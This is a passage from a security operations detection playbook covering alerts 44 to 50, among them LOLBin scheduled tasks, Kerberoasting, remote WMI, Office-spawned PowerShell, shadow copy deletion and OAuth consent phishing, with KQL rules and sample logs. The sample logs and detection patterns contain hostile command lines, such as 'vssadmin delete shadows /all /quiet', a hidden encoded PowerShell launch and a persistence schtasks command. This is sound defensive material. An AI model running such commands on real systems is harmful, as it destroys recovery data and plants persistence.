exfiltrate data or alter configurations.

Cloud Audit Log Entry

{
"TimeGenerated": "2025-04-23T08:20:45Z",
"APIKeyID": "svc-backup-key-8762",
"IdentityType": "ServiceAccount",
"Action": "ListBuckets",
"Resource": "s3://company-archives",
"SourceIPAddress": "190.89.112.13",
"Country": "Russia",
"UserAgent": "aws-sdk-go/1.38.7",
"Platform": "Unknown"
}

Threat Behavior Indicators

• First-time use of API key from foreign country or datacenter IP

• Access attempt shortly after GitHub or CI/CD code update
• High-sensitivity actions (example, DeleteBucket, CreateRole, AttachPolicy)
• Burst of usage patterns (example, mass downloads, CLI usage)

Response Actions

1. Immediately revoke the affected API key or token

2. Audit access logs to identify what resources were accessed or altered
3. Search code repositories and collaboration platforms for credential leaks
4. Enforce short-lived token rotation and IP restriction policies
5. Implement automated anomaly detection based on geo-IP and time-based usage
6. Use secrets scanning tools (example, TruffleHog, GitGuardian) on developer
pipelines
44. Alert Name: Malicious Scheduled Task Dropped via Living-off-the-Land Binaries
(LOLBins)

Alert Logic

Objective: Detect suspicious creation of scheduled tasks using native Windows tools
(LOLBins) like schtasks.exe, powershell.exe or cmd.exe, which adversaries often leverage
to maintain persistence or automate payload execution.

Data Sources:

• Sysmon (Event ID 1 – Process Creation)

• Windows Security Logs (Event ID 4698 – Scheduled Task Created)
• EDR telemetry with process lineage visibility

Detection Logic (KQL – Sysmon + Command Line Anomalies):

DeviceProcessEvents
| where FileName in~ ("schtasks.exe", "powershell.exe", "cmd.exe")
| where ProcessCommandLine has "/create" and ProcessCommandLine has_any (".bat",
".vbs", ".ps1", ".exe")
| where InitiatingProcessAccountName !contains "admin" and !startswith "svc"
| extend Alert = "Malicious scheduled task potentially created via LOLBin"

Alternate (Event ID 4698 – Task Creation via Suspicious Path):

SecurityEvent
| where EventID == 4698
| where TaskContent contains_any ("AppData", "Temp", "curl", "Invoke-WebRequest")
| extend Alert = "Suspicious scheduled task targeting non-system location"

MITRE ATT&CK Mapping

Tactic Persistence, Execution

Techniques T1053.005 – Scheduled Task/Job: Scheduled Task
T1218 – Signed Binary Proxy Execution (LOLBins)

Explanation:
LOLBins allow adversaries to blend into legitimate system processes while creating
scheduled tasks that execute malware, scripts or download payloads at reboot or set
intervals.
EDR Log Entry (Scheduled Task via schtasks.exe)

{
"TimeGenerated": "2025-04-23T08:35:11Z",
"DeviceName": "ENG-LAPTOP37",
"InitiatingProcessAccountName": "roslan.halim@company.com",
"FileName": "schtasks.exe",
"ProcessCommandLine": "schtasks /create /tn 'WinUpdateChecker' /tr 'powershell.exe -
ExecutionPolicy Bypass -File C:\\Users\\roslan\\AppData\\Local\\runme.ps1' /sc onlogon
/rl highest",
"ParentProcessName": "cmd.exe"
}

Threat Behavior Indicators

• Scheduled task references AppData, Temp or other user-writable directories

• Created with -ExecutionPolicy Bypass, curl or encoded commands
• Triggered on login or system boot using LOLBins
• Created by standard user account or compromised endpoint

Response Actions

1. Delete the scheduled task immediately and extract the target script or binary
2. Scan the host for additional persistence mechanisms or dropper artefacts
3. Check for lateral movement or task propagation to other endpoints
4. Harden endpoint controls to restrict task creation to admin accounts only
5. Deploy detection rules for LOLBin abuse across all hosts
6. Correlate with phishing emails, macro execution or initial access timeline
45. Alert Name: Abnormal Azure Resource Creation by Privileged Identity

Alert Logic

Objective: Detect unexpected or anomalous creation of cloud infrastructure resources

(VMs, Storage, Networking, Roles) in Azure by high-privilege identities a tactic used for
persistence, resource hijacking or stealthy lateral movement.

Data Sources:

• Azure Activity Logs

• Azure Resource Graph / Defender for Cloud
• Azure AD Sign-in logs
• SIEM or CSPM enrichment (with user privilege tags)

Detection Logic (KQL – Azure Activity + Identity Context):

AzureActivity
| where OperationName has_any ("Create Virtual Machine", "Create Network Interface",
"Create Role Assignment", "Create Key Vault")
| where IdentityLevel == "GlobalAdmin" or IdentityLevel == "PrivilegedRole"
| where Caller !in ("automated-deploy-user", "infra-admin-svc")
| summarise Actions = count() by Caller, ResourceGroup, OperationName,
bin(TimeGenerated, 15m)
| where Actions > 3
| extend Alert = "Abnormal Azure resource creation by privileged identity"

Alternate Logic (Out-of-Region Creation):

• Flag new Azure resources created from locations/IPs not associated with the user’s
historical access.

MITRE ATT&CK Mapping

Tactic Persistence, Defense Evasion

Techniques T1078.004 – Valid Accounts: Cloud Accounts
T1136.003 – Create Cloud Account
T1098.001 – Additional Cloud Roles

Explanation:
Threat actors with compromised privileged accounts may create backdoor resources
(example, hidden VMs, custom roles, invisible key vaults) for persistence, data access or
stealth control.
Azure Activity Log Entry

{
"TimeGenerated": "2025-04-23T08:50:00Z",
"Caller": "faridah.ismail@company.com",
"OperationName": "Create Virtual Machine",
"ResourceGroup": "Production-EU",
"Region": "East US",
"IPAddress": "203.111.45.78",
"IdentityLevel": "GlobalAdmin",
"Status": "Success"
}

Threat Behavior Indicators

• Unusual region or subscription for new resource creation

• Creation of VMs with outbound access but no logging/monitoring
• Role assignments to service principals not in policy
• Sudden burst of create operations without change ticket or justification

Response Actions

1. Review the created resources immediately isolate or delete if malicious

2. Audit the actor’s activity for signs of compromise (example, impossible travel,
lateral movement)
3. Enable Azure Defender policies to block risky configurations
4. Implement change control for resource creation by privileged users
5. Correlate with identity provider logs for suspicious sign-ins
6. Set up custom detection for privileged operations across all regions
46. Alert Name: Kerberoasting Attempt Detected via High Volume of TGS Requests

Alert Logic

Objective: Detect Kerberoasting attacks, where adversaries request Kerberos Ticket

Granting Service (TGS) tickets for service accounts in Active Directory, with the goal of
extracting and cracking them offline to gain lateral access or privilege escalation.

Data Sources:

• Windows Security Logs (Event ID 4769 – TGS Request Issued)

• Domain Controller logs
• SIEM with correlation capabilities
• AD user metadata (to identify service accounts)

Detection Logic (KQL – Volume & Entropy-Based):

SecurityEvent
| where EventID == 4769
| where ServiceName != "krbtgt"
| where TicketEncryptionType in (0x17, 0x18) // RC4, AES encryption
| summarise TGSRequestCount = count(), DistinctSPNs = dcount(ServiceName) by
TargetUserName, IpAddress, bin(TimeGenerated, 10m)
| where TGSRequestCount > 20 and DistinctSPNs > 10
| extend Alert = "Possible Kerberoasting attempt (abnormal TGS request volume)"

Alternate (Single Host SPN Sweep):

• Alert if >10 service accounts are requested from the same host in <5 minutes.

MITRE ATT&CK Mapping

Tactic Credential Access

Techniques T1558.003 – Steal or Forge Kerberos Tickets: Kerberoasting

Explanation:
Kerberoasting exploits the ability of any AD user to request service tickets. Attackers then
extract the tickets, attempt offline brute-force or dictionary attacks and impersonate
service accounts if successful.

Log Entry (Event ID 4769 – TGS Request)

{
"EventID": 4769,
 "TimeGenerated": "2025-04-23T09:05:17Z",
"TargetUserName": "svc_sqlprod",
"ServiceName": "MSSQLSvc/db01.corp.company.com:1433",
"TicketEncryptionType": "0x17",
"IpAddress": "10.1.22.40",
"ClientHostName": "ENG-LAPTOP37"
}

(Repeat across 25 service accounts in <10 minutes from the same host)

Threat Behavior Indicators

• High volume of TGS requests from single IP or user

• Targets multiple high-value SPNs (example, MSSQLSvc, HTTP, CIFS)
• Requests use RC4 encryption (easier to brute-force than AES)
• No follow-up access to the services themselves only ticket collection

Response Actions

1. Investigate the source host for credential dumping or recon activity

2. Correlate with abnormal logons or PowerShell enumeration tools (example,
PowerView)
3. Reset passwords for exposed service accounts and enable AES-only encryption
4. Monitor LSASS access attempts and memory scraping
5. Implement AD hardening: use strong passwords and Managed Service Accounts
(gMSAs)
6. Enable auditing and alerting on TGS volume per host/user over time
47. Alert Name: Suspicious Use of Remote WMI Execution Across Endpoints

Alert Logic

Objective: Detect use of Windows Management Instrumentation (WMI) for remote

command execution, often leveraged by adversaries during lateral movement or stealthy
administration without writing to disk.

Data Sources:

• Sysmon (Event ID 1 – Process Creation, Event ID 3 – Network Connection)

• Windows Security Logs (Event ID 4688 – Process Creation)
• EDR (CrowdStrike, Defender for Endpoint, SentinelOne)
• WMI-Activity logs (Microsoft-Windows-WMI-Activity/Operational)

Detection Logic (KQL – Process + Network Behaviour):

DeviceProcessEvents
| where InitiatingProcessFileName has_any ("wmic.exe", "powershell.exe")
| where ProcessCommandLine has_any ("wmic /node:", "Invoke-WmiMethod", "Get-
WmiObject", "winmgmts:\\")
| summarise WMIExecutions = count(), TargetHosts = dcount(ProcessCommandLine) by
DeviceName, InitiatingProcessAccountName, bin(TimeGenerated, 10m)
| where TargetHosts > 3
| extend Alert = "Suspicious remote WMI execution across multiple endpoints"

Alternate (Sysmon + WMI Provider Host):

Sysmon
| where EventID == 1
| where ParentImage endswith "WmiPrvSE.exe"
| where Image endswith ".exe"
| where CommandLine !contains "known admin tools"

MITRE ATT&CK Mapping

Tactic Lateral Movement

Techniques T1047 – Windows Management Instrumentation
T1021 – Remote Services

Explanation:
Remote WMI execution allows adversaries to interact with remote systems for fileless
execution, process manipulation or reconnaissance all without relying on PsExec or RDP.
WMI Log (Sysmon + PowerShell)

{
"TimeGenerated": "2025-04-23T09:20:22Z",
"DeviceName": "FINANCE-LAPTOP17",
"UserName": "shafiq.azmi@company.com",
"ProcessName": "powershell.exe",
"CommandLine": "Invoke-WmiMethod -Path Win32_Process -Name Create -ArgumentList
'notepad.exe' -ComputerName HR-WS03"
}

(Executed across 5 different endpoints in 10 minutes)

Threat Behavior Indicators

• Remote WMI execution targeting multiple hosts from a user workstation

• Use of scripting engines or LOLBins (example, PowerShell, wmic.exe)
• No ticket, task or change request associated with the activity
• Followed by lateral tool usage (example, token theft, recon or malware drops)

Response Actions

1. Investigate the source user and device for signs of compromise

2. Review the processes spawned remotely via WMI (example, cmd.exe,
powershell.exe)
3. Restrict WMI remote execution via GPO or firewall rules
4. Alert on WMI execution outside admin jump hosts or designated automation tools
5. Check for correlation with other lateral movement indicators (PsExec, RDP, WinRM)
6. Enable logging for WMI-Activity and centralise to SIEM for real-time alerting
48. Alert Name: Suspicious Process Chain Involving Office Application Spawning
PowerShell

Alert Logic

Objective: Detect when Microsoft Office applications (example, winword.exe, excel.exe,

powerpnt.exe) spawn PowerShell, which is a common behaviour in macro-based attacks,
phishing payloads and fileless malware execution.

Data Sources:

• Sysmon (Event ID 1 – Process Creation)

• EDR process tree data
• PowerShell ScriptBlock Logging (Event ID 4104)
• Windows Security Logs (Event ID 4688)

Detection Logic (KQL – Sysmon / EDR):

DeviceProcessEvents
| where ParentProcessName has_any ("winword.exe", "excel.exe", "powerpnt.exe",
"outlook.exe")
| where FileName == "powershell.exe"
| extend Alert = "Office app spawning PowerShell (suspicious process chain)"

Enhanced Logic (Script Content + Execution Policy Flags):

DeviceProcessEvents
| where ParentProcessName has_any ("winword.exe", "excel.exe")
| where FileName == "powershell.exe"
| where ProcessCommandLine has_any ("-enc", "FromBase64String", "-nop", "-w hidden")

MITRE ATT&CK Mapping

Tactic Execution, Defense Evasion

Techniques T1059.001 – PowerShell
T1203 – Exploitation for Client Execution (via macro)
T1027 – Obfuscated Files or Information

Explanation:
Malicious documents (often delivered via phishing) embed macros that silently launch
PowerShell for further exploitation usually leading to malware download, lateral movement
or C2 beaconing.

Process Execution Chain

[
{
"TimeGenerated": "2025-04-23T09:35:08Z",
"ParentProcess": "winword.exe",
"ProcessName": "powershell.exe",
"UserName": "aisyah.abdullah@company.com",
"CommandLine": "powershell.exe -nop -w hidden -enc JAB1AHIAbAAgAD0A..."
}
]

Threat Behavior Indicators

• Office applications launching PowerShell or cmd.exe directly

• PowerShell command includes -enc, -nop, -w hidden or base64 string
• No legitimate macro use in the document (example, finance template spawning
script)
• Process tree shows PowerShell → download utility or LOLBin

Response Actions

1. Isolate the endpoint and extract the malicious document

2. Decode PowerShell command and inspect for malicious behaviour
3. Alert security teams to phishing campaign indicators (email source, attachment
hash)
4. Restrict macro execution via GPO or use "Block all macros with notification" policy
5. Enable Office AMSI integration and ScriptBlock Logging in PowerShell
6. Educate users to never enable macros unless explicitly approved by IT
49. Alert Name: Anomalous Volume Shadow Copy Deletion (Anti-Recovery Behavior)

Alert Logic

Objective: Detect attempts to delete Volume Shadow Copies (VSS), which are used by
Windows for backup and restore. This behaviour is often linked to ransomware, as it
prevents recovery without external backups.

Data Sources:

• Sysmon (Event ID 1 – Process Creation)

• EDR tools (Defender for Endpoint, SentinelOne, CrowdStrike)
• Windows Security Logs (Event ID 4688 – Process Creation)

Detection Logic (KQL – Sysmon / EDR Execution Monitoring):

DeviceProcessEvents
| where FileName has_any ("vssadmin.exe", "wmic.exe", "powershell.exe")
| where ProcessCommandLine has_any ("delete shadows", "shadowcopy delete", "Resise-
StorageTier", "Disable-ComputerRestore")
| extend Alert = "Volume Shadow Copy deletion attempt detected"

Alternate (Script-Based Anti-Recovery Detection):

DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine contains "vssadmin delete shadows /all /quiet"

MITRE ATT&CK Mapping

Tactic Impact
Technique T1490 – Inhibit System Recovery

Explanation:
Deleting VSS copies is a destructive tactic to prevent rollback or restoration of encrypted
files, particularly seen during or right before ransomware deployment.

EDR Log (VSS Deletion Attempt)

{
"TimeGenerated": "2025-04-23T09:50:12Z",
"DeviceName": "FINANCE-SERVER01",
"UserName": "unknown_user",
"FileName": "vssadmin.exe",
 "ProcessCommandLine": "vssadmin delete shadows /all /quiet",
"ParentProcess": "ransomware_loader.exe"
}

Threat Behavior Indicators

• Use of vssadmin.exe or wmic to delete shadow copies silently

• Deletion initiated by unknown or non-admin user
• Occurs before or alongside file encryption or mass modification
• Parent process is suspicious or unrecognised binary

Response Actions

1. Immediately isolate the host to prevent further damage

2. Review all processes associated with vssadmin, wmic or powershell
3. Check for signs of ransomware activity (ransom note files, encrypted extensions)
4. Ensure regular backups are stored off-network or on immutable storage
5. Implement endpoint rules to block shadow copy deletions by default
6. Enable alerting for usage of sensitive admin tools in production systems
50. Alert Name: Unusual OAuth Consent Grant to External Application (Cloud App
Abuse)

Alert Logic

Objective: Detect when a user consents to an OAuth application that is either unverified,
unusual or external to the organisation, which may indicate phishing-based consent grant
attacks or illicit app registrations.

Data Sources:

• Microsoft 365 Audit Logs (Unified Audit Log, Azure AD logs)

• Google Workspace admin logs
• Identity providers (example, Okta, Ping, OneLogin)
• Cloud App Security / CASB

Detection Logic (KQL – M365 OAuth Consent):

AuditLogs
| where OperationName == "Consent to application"
| where ApplicationId !in (ApprovedAppList)
| where UserId !startswith "svc" and UserId !contains "admin"
| extend Alert = "Unusual OAuth application consent granted"

Alternate (Risk-Based Filtering):

• Trigger alert if application:

o Is not verified or published
o Requests risky permissions (example, Mail.ReadWrite, Files.Read.All,
User.ReadWrite.All)
o Was granted consent by non-admin users

MITRE ATT&CK Mapping

Tactic Initial Access, Persistence

Techniques T1528 – Steal Application Access Token
T1550.001 – Application Layer Protocol: OAuth Abuse

Explanation:
In consent phishing, attackers trick users into approving rogue apps that grant long-term
access to email, files and calendar data even after password resets or MFA changes.

OAuth Consent Audit Log

{
"TimeGenerated": "2025-04-23T10:05:33Z",
"UserId": "fatimah.saleh@company.com",
"AppDisplayName": "SecureDocs Sync Manager",
"ApplicationId": "a78d6aaf-0099-4f45-910a-ae5d01e79c2d",
"PermissionsGranted": ["Files.Read.All", "Mail.Send"],
"ConsentType": "User",
"Publisher": "external-unverified",
"ClientIP": "192.0.2.119"
}

Threat Behavior Indicators

• Consent given to unknown, unverified or newly registered apps

• App requests sensitive or wide-scope permissions (example, full mailbox, file
access)
• App is granted consent without admin review or from high-risk user
• App was never used previously and doesn't match company policy or tooling

Response Actions

1. Revoke consent immediately using Azure AD / Google Admin Console

2. Investigate the user who granted access verify phishing or social engineering
3. Review app permissions and investigate if data was accessed or exfiltrated
4. Block the app tenant-wide using conditional access or app blocking policies
5. Enable publisher verification requirement and admin consent workflow
6. Train users to report unexpected consent screens or prompt